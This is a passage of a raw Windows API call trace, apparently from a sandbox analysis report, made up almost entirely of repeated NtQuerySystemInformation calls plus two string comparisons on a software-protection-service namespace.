SystemInformation=0xc751f7ecf0, Length=0x38, ResultLength=0x0) [0240.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x20, ResultLength=0x0) [0240.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eaf0, Length=0x20, ResultLength=0x0) [0240.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eaf0, Length=0x20, ResultLength=0x0) [0240.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eaf0, Length=0x20, ResultLength=0x0) [0240.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x38, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x20, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb00, Length=0x20, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb00, Length=0x20, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x50, ResultLength=0x0) [0240.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef00, Length=0x28, ResultLength=0x0) [0240.583] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x50, ResultLength=0x0) [0240.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x50, ResultLength=0x0) [0240.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x50, ResultLength=0x0) [0240.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x38, ResultLength=0x0) [0240.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x28, ResultLength=0x0) [0240.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x28, ResultLength=0x0) [0240.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x28, ResultLength=0x0) [0240.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed50, Length=0x28, ResultLength=0x0) [0240.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x38, ResultLength=0x0) [0240.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x38, ResultLength=0x0) [0240.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed30, Length=0x20, ResultLength=0x0) [0240.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecb0, Length=0x20, ResultLength=0x0) [0240.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecb0, Length=0x20, ResultLength=0x0) [0240.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecb0, Length=0x20, ResultLength=0x0) [0240.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x38, ResultLength=0x0) [0240.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed30, Length=0x20, ResultLength=0x0) [0240.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecc0, Length=0x20, ResultLength=0x0) [0240.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecc0, Length=0x20, ResultLength=0x0) [0240.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x50, ResultLength=0x0) [0240.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef00, Length=0x28, ResultLength=0x0) [0240.595] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x50, ResultLength=0x0) [0240.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x50, ResultLength=0x0) [0240.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x50, ResultLength=0x0) [0240.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x38, ResultLength=0x0) [0240.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x28, ResultLength=0x0) [0240.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x28, ResultLength=0x0) [0240.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x28, ResultLength=0x0) [0240.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed50, Length=0x28, ResultLength=0x0) [0240.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x38, ResultLength=0x0) [0240.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x38, ResultLength=0x0) [0240.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed30, Length=0x20, ResultLength=0x0) [0240.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecb0, Length=0x20, ResultLength=0x0) [0240.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecb0, Length=0x20, ResultLength=0x0) [0240.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecb0, Length=0x20, ResultLength=0x0) [0240.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x38, ResultLength=0x0) [0240.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed30, Length=0x20, ResultLength=0x0) [0240.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecc0, Length=0x20, ResultLength=0x0) [0240.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecc0, Length=0x20, ResultLength=0x0) [0240.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x50, ResultLength=0x0) [0240.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x50, ResultLength=0x0) [0240.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x50, ResultLength=0x0) [0240.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x50, ResultLength=0x0) [0240.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea90, Length=0x38, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8c0, Length=0x28, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8c0, Length=0x28, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8c0, Length=0x28, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8c0, Length=0x28, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e930, Length=0x28, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea90, Length=0x38, ResultLength=0x0) [0240.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9b0, Length=0x28, ResultLength=0x0) [0240.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9b0, Length=0x28, ResultLength=0x0) [0240.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e850, Length=0x20, ResultLength=0x0) [0240.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x20, ResultLength=0x0) [0240.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x20, ResultLength=0x0) [0240.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x20, ResultLength=0x0) [0240.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea90, Length=0x38, ResultLength=0x0) [0240.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea90, Length=0x38, ResultLength=0x0) [0240.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e910, Length=0x20, ResultLength=0x0) [0240.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x20, ResultLength=0x0) [0240.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x20, ResultLength=0x0) [0240.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eed0, Length=0x50, ResultLength=0x0) [0240.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eed0, Length=0x50, ResultLength=0x0) [0240.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eed0, Length=0x50, ResultLength=0x0) [0240.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x50, ResultLength=0x0) [0240.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x50, ResultLength=0x0) [0240.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x50, ResultLength=0x0) [0240.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x50, ResultLength=0x0) [0240.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x38, ResultLength=0x0) [0240.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb20, Length=0x28, ResultLength=0x0) [0240.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb20, Length=0x28, ResultLength=0x0) [0240.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb20, Length=0x28, ResultLength=0x0) [0240.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb90, Length=0x28, ResultLength=0x0) [0240.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x38, ResultLength=0x0) [0240.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 